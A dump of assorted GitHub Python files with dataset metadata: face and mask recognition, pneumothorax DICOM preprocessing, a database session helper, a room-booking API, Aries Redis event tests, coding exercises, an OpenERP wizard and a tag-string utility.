cv2.COLOR_BGR2GRAY)\n\n # Retorna um retangulo com as coordenadas ao redor da face encontrada\n faces = face_cascade.detectMultiScale(gray)\n\n # Fecha o loop ao apertar Q\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n \n # Percorre as informações das faces encontradas\n for (x, y, w, h) in faces:\n face = gray[y:y + h, x:x + w]\n face_resize = cv2.resize(face, (width, height))\n\n # Retorna a porcentagem de similaridade da face detectada com o dataset\n prediction = model.predict(face_resize)\n\n classification = \"\"\n color = (0, 255, 0)\n\n # Lógica para dizer se está com mascara ou nao\n if face.shape[0] >= 200 and face.shape[1] >= 200:\n #Extrai as features da imagem.\n vector = pca.transform([face_resize.flatten()]) \n\n # Tenta identificar se está com máscara ou não.\n pred = knn.predict(vector)[0] \n\n # Busca a label conforme a identificação.\n classification = label[pred] \n\n # Alterando a cor do retangulo caso esteja sem mascara.\n if pred == 0:\n color = (0,0,255)\n\n # Mostra um retângulo ao redor do rosto do usuário.\n cv2.rectangle(image, (x, y), (x + w, y + h), color, 3)\n\n # O valor que calibra o reconhecimento, quanto menor o valor, mais preciso é a leitura da imagem gravada no treinamento.\n if prediction[1] < 120:\n # Coloca o texto acima da área reconhecida\n cv2.putText(image, '% s - %.0f - % s' % (names[prediction[0]], prediction[1], classification), (x - 10, y - 10), cv2.FONT_HERSHEY_PLAIN, 1, color)\n else:\n # Se a face não for reconhecida, mostra o desconhecido e detecta se está com máscara ou sem\n cv2.putText(image, 'Desconhecido - % s' % (classification), (x - 10, y - 10), cv2.FONT_HERSHEY_PLAIN, 1, color)\n\n # Exibir a imagem da camera em uma janela.\n cv2.imshow('Leitura Facial', image)\n","repo_name":"gabriell-ferreira/mask-detect","sub_path":"recognizer.py","file_name":"recognizer.py","file_ext":"py","file_size_in_byte":6054,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18917453936","text":"# import os\n# import cv2\n# import pdb\n# import time\n# import warnings\n# import random\n# import numpy as np\n# import pandas as pd\n# from tqdm import tqdm_notebook as tqdm\n# from torch.optim.lr_scheduler import ReduceLROnPlateau\n# from sklearn.model_selection import StratifiedKFold\n# import torch\n# import torch.nn as nn\n# from torch.nn import functional as F\n# import torch.optim as optim\n# import torch.backends.cudnn as cudnn\n# from torch.utils.data import DataLoader, Dataset, sampler\n# from matplotlib import pyplot as plt\n# from albumentations import (HorizontalFlip, ShiftScaleRotate, Normalize, Resize, Compose, GaussNoise)\n# from albumentations.torch import ToTensor\n# # import segmentation_models_pytorch as smp\n# from utils.RleFunction import run_length_decode\n# warnings.filterwarnings(\"ignore\")\n# class SIIMDataset(Dataset):\n# def __init__(self, df, data_folder, size, mean, std, phase):\n# self.df = df\n# self.root = data_folder\n# self.size = size\n# self.mean = mean\n# self.std = std\n# self.phase = phase\n# self.transforms = get_transforms(phase, size, mean, std)\n# self.gb = self.df.groupby('ImageId')\n# self.fnames = list(self.gb.groups.keys())\n#\n# def __getitem__(self, idx):\n# image_id = self.fnames[idx]\n# df = self.gb.get_group(image_id)\n# annotations = df[' EncodedPixels'].tolist()\n# image_path = os.path.join(self.root, image_id + \".png\")\n# image = cv2.imread(image_path)\n# mask = np.zeros([1024, 1024])\n# if annotations[0] != '-1':\n# for rle in annotations:\n# mask += run_length_decode(rle)\n# mask = (mask >= 1).astype('float32') # for overlap cases\n# augmented = self.transforms(image=image, mask=mask)\n# image = augmented['image']\n# mask = augmented['mask']\n# return image, mask\n#\n# def __len__(self):\n# return len(self.fnames)\n#\n#\n# def get_transforms(phase, size, mean, std):\n# list_transforms = []\n# if phase == \"train\":\n# list_transforms.extend(\n# [\n# # HorizontalFlip(),\n# ShiftScaleRotate(\n# shift_limit=0, # no resizing\n# scale_limit=0.1,\n# rotate_limit=10, # rotate\n# p=0.5,\n# border_mode=cv2.BORDER_CONSTANT\n# ),\n# # GaussNoise(),\n# ]\n# )\n# list_transforms.extend(\n# [\n# Normalize(mean=mean, std=std, p=1),\n# Resize(size, size),\n# ToTensor(),\n# ]\n# )\n#\n# list_trfms = Compose(list_transforms)\n# return list_trfms\n#\n#\n# def provider(\n# fold,\n# total_folds,\n# data_folder,\n# df_path,\n# phase,\n# size,\n# mean=None,\n# std=None,\n# batch_size=8,\n# num_workers=4,\n# ):\n# df = pd.read_csv(df_path)\n# df = df.drop_duplicates('ImageId')\n# df_with_mask = df[df[\" EncodedPixels\"] != \" -1\"]\n# df_with_mask['has_mask'] = 1\n# df_without_mask = df[df[\" EncodedPixels\"] != \" -1\"]\n# df_without_mask['has_mask'] = 0\n# df_without_mask_sampled = df_without_mask.sample(len(df_with_mask))\n# df = pd.concat([df_with_mask, df_without_mask_sampled])\n# # NOTE: equal number of positive and negative cases are chosen.\n#\n# kfold = StratifiedKFold(total_folds, shuffle=True, random_state=69)\n# train_idx, val_idx = list(kfold.split(\n# df[\"ImageId\"], df[\"has_mask\"]))[fold]\n# train_df, val_df = df.iloc[train_idx], df.iloc[val_idx]\n# df = train_df if phase == \"train\" else val_df\n# # NOTE: total_folds=5 -> train/val : 80%/20%\n#\n# image_dataset = SIIMDataset(df, data_folder, size, mean, std, phase)\n#\n# dataloader = DataLoader(\n# image_dataset,\n# batch_size=batch_size,\n# num_workers=num_workers,\n# pin_memory=True,\n# shuffle=True,\n# )\n# return dataloader\n# import settings\n# data_folder=settings.data_folder\n# train_rle_path=settings.train_rle_path\n#\n#\n# dataloader = provider(\n# fold=0,\n# total_folds=5,\n# data_folder=data_folder,\n# df_path=train_rle_path,\n# phase=\"train\",\n# size=512,\n# mean = (0.485, 0.456, 0.406),\n# std = (0.229, 0.224, 0.225),\n# batch_size=16,\n# num_workers=4,\n# )\n#\n# batch = next(iter(dataloader)) # get a batch from the dataloader\n# images, masks = batch\n# print(images.shape,masks.shape)\n\n# import pydicom\n# import cv2\n# import matplotlib.pyplot as plt\n# import numpy as np\n# path='/home/cooper/PycharmProjects/SIIM/siim-acr-pneumothorax-segmentation/dataset/pneumothorax/dicom-images-test/1.2.276.0.7230010.3.1.2.8323329.580.1517875163.537052/1.2.276.0.7230010.3.1.3.8323329.580.1517875163.537051/1.2.276.0.7230010.3.1.4.8323329.580.1517875163.537053.dcm'\n# image=pydicom.dcmread(path)\n# ndarray=image.pixel_array\n# ndarray=np.array(ndarray,np.uint8)\n# plt.imshow(ndarray)\n# print(ndarray.shape)\n# cv2.imshow('image',ndarray)\n# cv2.waitKey(0)\n# plt.show()\n#\nimport numpy as np\nimport pandas as pd\nimport os\nimport pydicom\nfrom tqdm import tqdm\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport settings\n\n# import mask utilities\nimport sys\n\n# sys.path.insert(0, '../input/siim-acr-pneumothorax-segmentation')\nfrom utils.mask_functions import rle2mask\n\n\ndef extract_dcm_pixel_array(file_path):\n return pydicom.dcmread(file_path).pixel_array\n\n\ndef extract_dcm_metadata(file_path):\n ds = pydicom.dcmread(file_path)\n d = {}\n for elem in ds.iterall():\n if elem.name != 'Pixel Data' and elem.name != \"Pixel Spacing\":\n d[elem.name.lower().replace(\" \", \"_\").replace(\"'s\", \"\")] = elem.value\n elif elem.name == \"Pixel Spacing\":\n d[\"pixel_spacing_x\"] = elem.value[0]\n d[\"pixel_spacing_y\"] = elem.value[1]\n\n return d\n\n\ndef create_metadataset(df):\n ImageIds = []\n data = []\n all_feats = set()\n\n for index, row in tqdm(df[[\"ImageId\", \"path\"]].drop_duplicates().iterrows()):\n path = row[\"path\"]\n ImageId = row[\"ImageId\"]\n feature_dict = extract_dcm_metadata(path)\n data.append(feature_dict)\n ImageIds.append(ImageId)\n feats = set(feature_dict.keys())\n if len(feats - all_feats) > 0:\n all_feats = all_feats.union(feats)\n\n df_meta = pd.DataFrame(columns=[\"ImageId\"])\n df_meta[\"ImageId\"] = ImageIds\n\n for feat in sorted(all_feats):\n df_meta[feat] = [d[feat] for d in data]\n\n df_meta['patient_age'] = df_meta['patient_age'].map(lambda x: int(x))\n return df_meta\n\n\nDATA_PATH = settings.DATASETDIR\nSAMPLE_SUBMISSION = \"/home/cooper/PycharmProjects/SIIM/siim-acr-pneumothorax-segmentation/sample_submission.csv\"\n\ndf_train = pd.DataFrame([(name.replace(\".dcm\", \"\"), os.path.join(root, name)) for root, dirs, files in\n os.walk(DATA_PATH + \"/dicom-images-train\")\n for name in files if name.endswith((\".dcm\"))], columns=['ImageId', 'path'])\n\ndf_test = pd.DataFrame([(name.replace(\".dcm\", \"\"), os.path.join(root, name)) for root, dirs, files in\n os.walk(DATA_PATH + \"/dicom-images-test\")\n for name in files if name.endswith((\".dcm\"))], columns=['ImageId', 'path'])\n\n\n\ndf_sub = pd.read_csv(SAMPLE_SUBMISSION)\n\ndf_rle = pd.read_csv(DATA_PATH + \"/train-rle.csv\")\ndf_rle = df_rle.rename(columns={' EncodedPixels': 'EncodedPixels'})\ndf_rle[\"EncodedPixels\"] = df_rle[\"EncodedPixels\"].map(lambda x: x[1:])\n\ndf_train = df_train.merge(df_rle, on=\"ImageId\", how=\"left\")\n\nnot_pneumothorax_ImageId = set(\n df_train.query(\"EncodedPixels == '-1' or EncodedPixels.isnull()\", engine='python')[\"ImageId\"])\ndf_train[\"pneumothorax\"] = df_train[\"ImageId\"].map(lambda x: 0 if x in not_pneumothorax_ImageId else 1)\n\ndf_train[\"rle_count\"] = df_train[\"ImageId\"].map(df_rle.groupby([\"ImageId\"]).size())\ndf_train[\"rle_count\"] = df_train[\"rle_count\"].fillna(-1)\n\n## adding dicom metadata\n\ndf_meta = create_metadataset(df_train)\nmeta_feats = [c for c in df_meta.columns if c != \"ImageId\"]\n\ndf_train = df_train.merge(df_meta, on=\"ImageId\", how='left')\ndf_test = df_test.merge(create_metadataset(df_test), on=\"ImageId\", how='left')\n\ndf_train.to_csv(\"train.csv\", index=False)\ndf_test.to_csv(\"test.csv\", index=False)\n\ndf_sub[\"entries\"] = df_sub[\"ImageId\"].map(df_sub.groupby(['ImageId']).size())\n\nprint(\"train-rle: {}, unique ImageId: {}\".format(len(df_rle), len(df_rle[\"ImageId\"].unique())))\nprint(\"train: {}, unique ImageId: {}\".format(len(df_train), len(df_train[\"ImageId\"].unique())))\nprint(\"train ImageId not in rle: {}\".format(\n len(df_train.query(\"EncodedPixels.isnull()\", engine='python'))))\nprint(\"train ImageId with multiple rle: {}\".format(\n len(df_train.query(\"rle_count > 1\", engine='python')[\"ImageId\"].unique())))\n\nprint(\"sample_submission: {}, unique ImageId: {}, ImegeId with multiple entries: {}\".format(\n len(df_sub),\n len(df_sub[\"ImageId\"].unique()),\n len(df_sub.query(\"entries > 1\")[\"ImageId\"].unique())\n))\n\nprint(\"test: {}, unique ImageId: {}\".format(len(df_test), len(df_test[\"ImageId\"].unique())))\nprint(\"test ImageId not in sample_submission: {}\".format(\n len(df_test[~ df_test[\"ImageId\"].isin(df_sub[\"ImageId\"])])))\n\n\n\n# print('fasdfsa')","repo_name":"kepengxu/kaggle-tgs-salt","sub_path":"examples/trials/kaggle-tgs-salt/testdir/test3.py","file_name":"test3.py","file_ext":"py","file_size_in_byte":9389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43910453805","text":"from functools import lru_cache\nfrom typing import Iterator\n\nimport sqlalchemy as sa\nfrom sqlalchemy.orm import Session, sessionmaker\nfrom sqlalchemy.pool import NullPool\n\nfrom app.core.settings import settings\n\n\n@lru_cache()\ndef get_session_maker() -> sessionmaker:\n engine = sa.create_engine(settings.SQLALCHEMY_DATABASE_URI, poolclass=NullPool)\n session_local = sessionmaker(autocommit=False, autoflush=False, bind=engine)\n return session_local\n\n\ndef get_db() -> Iterator[Session]:\n session_local = get_session_maker()\n session = session_local()\n\n try:\n yield session\n except Exception as exc:\n session.rollback()\n raise exc\n finally:\n session.close()\n","repo_name":"Datbe2001/Course_BE","sub_path":"app/db/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"15894171057","text":"import sys\n\nsys.stdin = open(\"1600말이되고픈원숭이.txt\")\n\nK = int(input())\n\nW, H = map(int, input().split())\n\nboard = [list(map(int, input().split())) for _ in range(H)]\n\nresult = 987654321\ndx = [0,0,-1,1]\ndy = [-1,1,0,0]\n\nhx = [-2,-1,1,2,-2,-1,1,2]\nhy = [-1,-2,-2,-1,1,2,2,1]\n\nvisited = [[[-1 for _ in range(W)] for _ in range(H)] for _ in range(K+1)]\n\ndef monkey(x,y, dist, hmove):\n 1\nmonkey(0,0,1,0)\n\nif result == 987654321:\n result = -1\n\n\n\nprint(result)","repo_name":"Nyapy/TIL","sub_path":"04_algorithm/백준/1600말이되고픈원숭이(찐).py","file_name":"1600말이되고픈원숭이(찐).py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"21951230494","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, print_function\n\nfrom flask import request, g\n\nfrom . import Resource\nfrom .. import schemas\nimport sqlite3 as sql\n\nclass Room(Resource):\n\n def post(self):\n print(g.json)\n info = g.json\n conn_1 = sql.connect('./database_epic2/roomdb')\n conn1c = conn_1.cursor()\n conn1c.execute(\"\"\"SELECT COUNT(*) FROM room_address\"\"\")\n res1 = conn1c.fetchone()\n rid = res1[0]\n info[\"rid\"] = \"r\"+str(rid)\n conn1c.execute(\"\"\"INSERT INTO room_address (rid,city,surburb,address) VALUES (?,?,?,?)\"\"\",\n (info[\"rid\"],info[\"city\"],info[\"Suburb\"],info[\"Address\"]))\n conn1c.execute(\"SELECT * FROM room_address\")\n conn_1.commit()\n conn1c.close()\n conn_1.close()\n for item in info:\n if info[item] == True:\n info[item] = 1\n elif info[item] == False:\n info[item] = 0\n conn_2 = sql.connect('./database_epic2/roomdb')\n conn2c = conn_2.cursor()\n conn2c.execute(\"\"\"INSERT INTO room (rid,sid,name,slug,type,price,capacity,pets,breakfast,airconditioner,\n carpark,wifi,gym,kitchen,description,url1,url2,url3,url4,url5)\n VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)\"\"\"\n ,(info[\"rid\"],info[\"sid\"],info[\"name\"],info[\"slug\"],info[\"type\"],info[\"price\"],info[\"capacity\"]\n ,info[\"pets\"],info[\"breakfast\"],info[\"airconditioner\"],info[\"carpark\"],info[\"wifi\"],\n info[\"gym\"],info[\"kitchen\"],info[\"description\"],info[\"url1\"],info[\"url2\"],info[\"url3\"],info[\"url4\"],\n info[\"url5\"]))\n conn2c.execute(\"SELECT * FROM room\")\n print(conn2c.fetchall())\n conn_2.commit()\n conn2c.close()\n conn_2.close()\n return \"Succeed\",200,None\n pass\n","repo_name":"kong-ivy/accommodation_website_backend_code","sub_path":"Service2/app/demo/v2/api/room.py","file_name":"room.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6142716570","text":"\"\"\"Basic Message Tests\"\"\"\nimport json\nimport time\n\nimport pytest\n\nfrom . import FABER, ALICE, RELAY, Agent\n\n\n@pytest.fixture(scope=\"session\")\ndef faber():\n \"\"\"faber agent fixture.\"\"\"\n yield Agent(FABER)\n\n\n@pytest.fixture(scope=\"session\")\ndef alice():\n \"\"\"alice agent fixture.\"\"\"\n yield Agent(ALICE)\n\n\n@pytest.fixture(scope=\"session\")\ndef relay():\n \"\"\"alice agent fixture.\"\"\"\n yield Agent(RELAY)\n\n\nPAYLOAD_B64 = \"\"\"\n eyJwcm90ZWN0ZWQiOiAiZXlKbGJtTWlPaUFpZUdOb1lXTm9ZVEl3Y0c5c2VURXpNRFZmYVdWM\n FppSXNJQ0owZVhBaU9pQWlTbGROTHpFdU1DSXNJQ0poYkdjaU9pQWlRWFYwYUdOeWVYQjBJaX\n dnSW5KbFkybHdhV1Z1ZEhNaU9pQmJleUpsYm1OeWVYQjBaV1JmYTJWNUlqb2dJakZqWjNsMFF\n tMTNNM0V4YUdkaVZ6Qkpiak50U0c4MldXaExUMnRwUnpWRWVUaHJSakpJV2pZeGNUSnZXV00z\n Ym10dVN6bE9TVWMyU0VobFUyTm9lV0VpTENBaWFHVmhaR1Z5SWpvZ2V5SnJhV1FpT2lBaU5FU\n kNTalJhY0RnMU1XZHFlazUwU20xdGIwVTVOMWR4Vm5KWFRqTTJlVnBTWVVkcFpqUkJSM0o0ZD\n FFaUxDQWljMlZ1WkdWeUlqb2dJak5XY0hsU2NVRlpUV3N5Tms1RmMwUXpObU5mWjJnMFZIazB\n aamd3TUd4RFJHRXdNMWxsUlc1bVJYQm1WMmhKTFdkelpFY3RWR1JrTVdWTmFEbFpTWG8zTkhS\n RlN6SnNSMVZhVFhwZk5HdDFkMEpUVWtvMFRGOWhkMVJLUVZWVmQydFRWbmhyTXpSblVWVmZOV\n 2RyZDFSa09FWTFUa0ZsU1U1UVZTSXNJQ0pwZGlJNklDSnFWVkpDUW1OaVQzZzNOa05zVmw4eG\n F6aFJNMjlyVW5KdFJHUTFhM0JwUWlKOWZWMTkiLCAiaXYiOiAiTVdnR3VRNF9ab2dxVVJUbiI\n sICJjaXBoZXJ0ZXh0IjogIlVNTGFQOU13ZF9wOFR1bWdwcVZWQWZTSWZXc1g3a0lWLUR4Rndf\n VHRTQ2pWdTVTbG5RYmtkTVJLd3VyZGI1dmd6Q0tUNUFybFV0WEFMMm1sSUlpUGpSYzVmSzhLc\n 013S0dFemkycEtrdmxDN1EzUXRKWTE5WmVTSjlYMGlUOWxOamNEM25KS0o1bzlkSjhVWGZpNU\n 80ZEtaLWxlVy1qOHlzTEFTSTh1eEZYVVNoUmxlNy03bm5HZkZnRlZBRjNaWVpqNlRXUUJrdkd\n SUk96TzMwTHNEWHBzalNqMWZfd056RWdxTmpPMERZemRKa0lBNm1BQ1AiLCAidGFnIjogImVB\n ZVFiakktVmpkN21hcWdTNElGTlEifQ==\n\"\"\"\n\n\n@pytest.fixture(scope=\"session\", autouse=True)\ndef established_connection(faber, alice):\n \"\"\"Established connection filter.\"\"\"\n invite = alice.create_invitation(auto_accept=\"true\")[\"invitation\"]\n resp = faber.receive_invite(invite, auto_accept=\"true\")\n yield resp[\"connection_id\"]\n\n\n@pytest.mark.asyncio\nasync def test_base_redis_keys_are_set(redis):\n time.sleep(1)\n assert await redis.lrange(\"acapy-record-base\", 0, -1) != []\n assert await redis.lrange(\"acapy-record-with-state-base\", 0, -1) != []\n\n\n@pytest.mark.asyncio\nasync def test_outbound_queue_removes_messages_from_queue_and_deliver_sends_them(faber: Agent, established_connection: str, redis):\n faber.send_message(established_connection, \"Hello Alice\")\n faber.send_message(established_connection, \"Another Alice\")\n msg_received = False\n retry_pop_count = 0\n while not msg_received:\n msg = await redis.blpop(\"acapy_outbound\", 2)\n if not msg:\n if retry_pop_count > 3:\n raise Exception(\"blpop call failed to retrieve message\")\n retry_pop_count = retry_pop_count + 1\n time.sleep(1)\n msg_received = True\n messages = faber.retrieve_basicmessages()['results']\n assert \"Hello Alice\" in (msg['content'] for msg in messages)\n assert \"Another Alice\" in (msg['content'] for msg in messages)\n\n\n@pytest.mark.asyncio\nasync def test_deliverer_pulls_messages_from_queue_and_sends_them(\n faber: Agent,\n established_connection: str,\n redis\n):\n test_msg = \"eyJjb250ZW50IjogInRlc3QtbXNnIn0=\" # {\"content\": \"test-msg\"}\n outbound_msg = {\n \"service\": {\"url\": f\"{faber.url}/connections/{established_connection}/send-message\"},\n \"payload\": test_msg,\n }\n await redis.rpush(\n \"acapy_outbound\",\n str.encode(json.dumps(outbound_msg)),\n )\n\n time.sleep(5)\n messages = faber.retrieve_basicmessages()['results']\n matching_msgs = [\n msg for msg in messages if msg['content'] == \"test-msg\"]\n assert matching_msgs.__len__() == 2 # 1 for sent, 1 for received\n assert await redis.lrange(\"acapy_outbound\", 0, -1) == []\n\n\n@pytest.mark.asyncio\nasync def test_relay_has_keys_in_recip_key_uid_map(redis, relay: Agent):\n time.sleep(1)\n recip_keys = await redis.hgetall(\"recip_key_uid_map\")\n assert recip_keys\n msg_count = await redis.hgetall(\"uid_recip_key_pending_msg_count\")\n assert msg_count\n\n\n@pytest.mark.asyncio\nasync def test_deliverer_retry_on_failure(\n faber: Agent,\n established_connection: str,\n redis,\n):\n outbound_msg = {\n \"service\": {\"url\": \"http://alice:3002/fake/\"},\n \"payload\": PAYLOAD_B64,\n }\n # produce a outbound message with bad endpoint\n await redis.rpush(\n \"acapy_outbound\",\n str.encode(json.dumps(outbound_msg)),\n )\n # assume failure code 400, delay queue, and failure code 400 ...\n time.sleep(1)\n msg = await redis.blpop(\"acapy_outbound\", 10)\n assert msg\n # check for manual commit of previous message by handling a new message\n faber.send_message(established_connection, 'test-failed-msg')\n msg_received = False\n retry_pop_count = 0\n while not msg_received:\n msg = await redis.blpop(\"acapy_outbound\", 10)\n if not msg:\n if retry_pop_count > 3:\n raise Exception(\"blpop call failed to retrieve message\")\n retry_pop_count = retry_pop_count + 1\n time.sleep(1)\n msg_received = True\n\n assert \"test-failed-msg\" in (msg['content']\n for msg in faber.retrieve_basicmessages()['results'])\n","repo_name":"hyperledger/aries-acapy-plugins","sub_path":"redis_events/integration/tests/test_events.py","file_name":"test_events.py","file_ext":"py","file_size_in_byte":5330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29331643729","text":"#Aprobación de créditos\na=int(input(\"Ingrese su sueldo en pesos: \"))\nb=int(input(\"Ingrese su año de nacimiento: \"))\nc=int(input(\"Ingrese su numero de hijos: \"))\nd=int(input(\"Ingrese años de pertenencia en el banco: \"))\ne=input(\"Ingrese S si es soltero, ingrese C si es casado: \")\nf=input(\"Si vive en ciudad escriba U, ingrese R si vive en campo: \")\ng=(\"APROBADO\")\nh=(\"RECHAZADO\")\nif d>10 and c>=2:\n print(g)\nelif e==\"C\" and c>3 and 1962<=b<=1972:\n print(g)\nelif a>2500.000 and e==\"S\" and f==\"U\":\n print(g) \nelif a>3500.000 and d>5:\n print(g)\nelif f==\"R\" and e==\"C\" and c<2:\n print(g)\nelse:\n print(h)","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej3/hito1_ej3_d71f01397c02c51cf6a36368582a7617.py","file_name":"hito1_ej3_d71f01397c02c51cf6a36368582a7617.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26651475674","text":"def strictlyLarger(base,top,w,h,d):\n return(base <= 0 or top >= len(w) or w[base] > w[top] and h[base] > h[top] and d[base] > d[top])\n\ndef sortByHeight(w,h,d):\n h,w,d = zip(*sorted(zip(h,w,d)))\n return(w,h,d)\n\ndef stackBoxes(w,h,d):\n w,h,d = sortByHeight(w,h,d)\n # max height considering the addition of box\n\n n = len(w) # number of boxes\n stack = [0]\n\n for box in range(1,n):\n for i,top in enumerate(stack):\n # if it can be inserted without removing boxes\n if strictlyLarger(i-1,box,w,h,d) and strictlyLarger(box,i,w,h,d):\n stack.insert(i, box)\n break\n # if can be inserted by removing some boxes\n elif strictlyLarger(box,i,w,h,d):\n # if box taller than base being replaced\n replacedHeight = sum([h[x] for x in stack[:i-1]])\n if h[box] > replacedHeight:\n stack = [box] + stack[i:]\n break\n return(sum([h[i] for i in stack]))\n\nif __name__==\"__main__\":\n tInput = (([5,4,3,2,1],[1,2,3,4,5],[9,3,5,1,5]),([1,2,3,4,5],[1,2,3,4,5],[1,2,3,4,5]),([1,2,3,1,5],[2,3,4,4,5],[1,2,3,4,5]))\n tOutput = (1,15,14)\n for i,t in enumerate(tInput):\n print(\"Input: {}\".format(t))\n tres = stackBoxes(t[0],t[1],t[2])\n print(\"Output: {}\".format(tres))\n if tres != tOutput[i]:\n print(\"ERROR: expected {},\".format(tOutput[i]))\n","repo_name":"michlee1337/practice","sub_path":"CTCI/c8_recurAndDp/stackBoxes.py","file_name":"stackBoxes.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"73791483768","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jul 1 19:17:00 2017\n\n@author: cdonnat\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport csv \n\n\npath='/Users/cdonnat/Dropbox/Financial Networks/data/'\n\n#filename='companylist.csv'\nfilename='book_CompanyInfo.csv'\ndef load_sectors(path,filename='book_CompanyInfo.csv'):\n \n CompanyInfo={}\n CompanySector={}\n CompanyIndustry={}\n line=0\n with open(path+filename, 'rb') as f:\n reader = csv.reader(f)\n data= list(reader)\n for i in range(len(data)):\n CompanyInfo[data[i][0]]=[data[i][6],data[i][7]]\n CompanySector[data[i][0]]=[data[i][6]]\n CompanyIndustry[data[i][0]]=[data[i][7]]\n \n CompanySector=pd.DataFrame.from_dict(CompanySector)\n CompanySector.index=['Sector']\n CompanyIndustry=pd.DataFrame.from_dict(CompanyIndustry)\n CompanyIndustry.index=['Industry']\n CompanyInfo=pd.DataFrame.from_dict(CompanyInfo)\n CompanyInfo.index=['Sector','Industry']\n return CompanySector,CompanyIndustry,CompanyInfo\n\n\n\ndef load_sectors2(path,filename='book_CompanyInfo.csv'):\n CompanyInfo=pd.DataFrame.from_csv(path+filename, sep=\",\",header=0)\n cols=CompanyInfo.columns.values\n cols[2:5]=['Sector','Industry','Industry_subgroup']\n CompanyInfo.columns=cols\n index_name=CompanyInfo.index\n \n sectors=pd.DataFrame(np.unique(CompanyInfo.Sector),columns=['Sector'])\n sectors['Sector_key']=sectors.index\n CompanyInfo=CompanyInfo.merge(sectors,right_on='Sector',left_on='Sector',how='left')\n \n industry=pd.DataFrame(np.unique(CompanyInfo.Industry),columns=['Industry'])\n industry['Industry_key']=industry.index\n CompanyInfo=CompanyInfo.merge(industry,right_on='Industry',left_on='Industry',how='left')\n \n \n industry_subgroup=pd.DataFrame(np.unique(CompanyInfo.Industry_subgroup),columns=['Industry_subgroup'])\n industry_subgroup['Industry_subgroup_key']=industry_subgroup.index\n CompanyInfo=CompanyInfo.merge(industry_subgroup,right_on='Industry_subgroup',left_on='Industry_subgroup',how='left')\n CompanyInfo.index=index_name\n return CompanyInfo\n\n\n\ndef deal_with_nans_sectors(CompanyInfo,betas):\n get_nan=CompanyInfo.applymap(lambda x: x=='n/a')\n where_nan=get_nan.sum(0)\n one_miss=list(np.where((where_nan==1))[0])\n two_miss=list(np.where((where_nan==2))[0])\n return CompanyInfo.iloc[:,(where_nan==0)]\n#list_Sectors=set([v for (k,v) in CompanySector.iteritems()])\n#list_Industries=set([v for (k,v) in CompanyIndustry.iteritems()])\n#company_labels={}\n#for (k,v) in CompanySector.iteritems():\n# company_labels[k]=[k,v,CompanyIndustry[k]]\n#company_labels.to_csv('company_labels.csv)\n","repo_name":"donnate/Financial-Networks","sub_path":"extract_sectors.py","file_name":"extract_sectors.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15593071176","text":"import time\nfrom osv import osv, fields\nimport pooler\nfrom tools.translate import _\nfrom datetime import datetime\n\nclass outward_commission(osv.osv_memory):\n\n _name = 'outward.commission'\t\t \n _columns = {\n 'date':fields.date('Date', required=True),\n 'bl_type': fields.selection([(1, 'KLIS'), (2, 'KKK')], \"BL Type\", help = 'Select BL type', required=True, size=-1),\n 'output_type': fields.selection([(1, 'PDF'), (2, 'XLS')], \"Output Type\", help = 'Select output type', required=True, size=-1),\n }\n\n _defaults= {\n 'bl_type': 1,\n 'output_type': 1,\n 'date': lambda *a: time.strftime('%Y-%m-%d'),\n }\n def print_report(self, cr, uid, ids, context=None):\n company=self.pool.get('res.users').browse(cr,uid,uid).company_id\n comm_obj=self.browse(cr,uid,ids[0],context=context)\n dtt = datetime.strptime(comm_obj.date, '%Y-%m-%d')\n \n \n report_param={\n 'company_name':company and company.name or '',\n 'address':company.partner_id.complete_address,\n 'tel_fax':company and \"Tel/Fax: %s , %s \" % (company.phone and company.phone or '' , company.fax and company.fax or '' ),\n 'date':comm_obj.date,\n 'cost_month':dtt.strftime('%m-%Y'),\n 'int_cost_month':dtt.month,\n 'int_cost_year':dtt.year,\n }\n\n if comm_obj.bl_type ==1:\n report_name='outward.commission.klis'\n else:\n report_name='outward.commission.kkk'\n\n\n return {\n 'type': 'ir.actions.report.xml',\n 'report_name':report_name,\n 'datas': {'parameters':report_param }\n }\t\t\n\noutward_commission()\n\n\n\n\n","repo_name":"Thomasmdy/openerp","sub_path":"container_management/wizard/out_ward_commission.py","file_name":"out_ward_commission.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"33837985529","text":"\"\"\"\nContains utility functions for turning objects into strings and back.\n\"\"\"\n\nfrom global_variables import ROOT\n\n\ndef _t(tag): return \"<\" + tag + \">\"\n\n\ndef _et(tag): return \"<\\\\\" + tag + \">\"\n\n\ndef create_tag(tag: str, string_to_add) -> str:\n return _t(tag) + str(string_to_add).replace(\"<\", \" tuple:\n tag_start=string.find(\"<\")\n if string[tag_start+1]==\"\\\\\" :\n return _find_next_tag_and_tag_end(string[tag_start+1:])\n end = string.find(\">\")\n return string[tag_start+1:end], end\n\n\ndef _find_content_and_tag_end(string: str, tag: str) -> tuple:\n content_end = string.find(_et(tag))\n tag_end = string[content_end:].find(\">\") + content_end\n return content_end, tag_end\n\n\ndef _find_tag_and_tag_end(string: str, tag: str) -> tuple:\n tag_start = 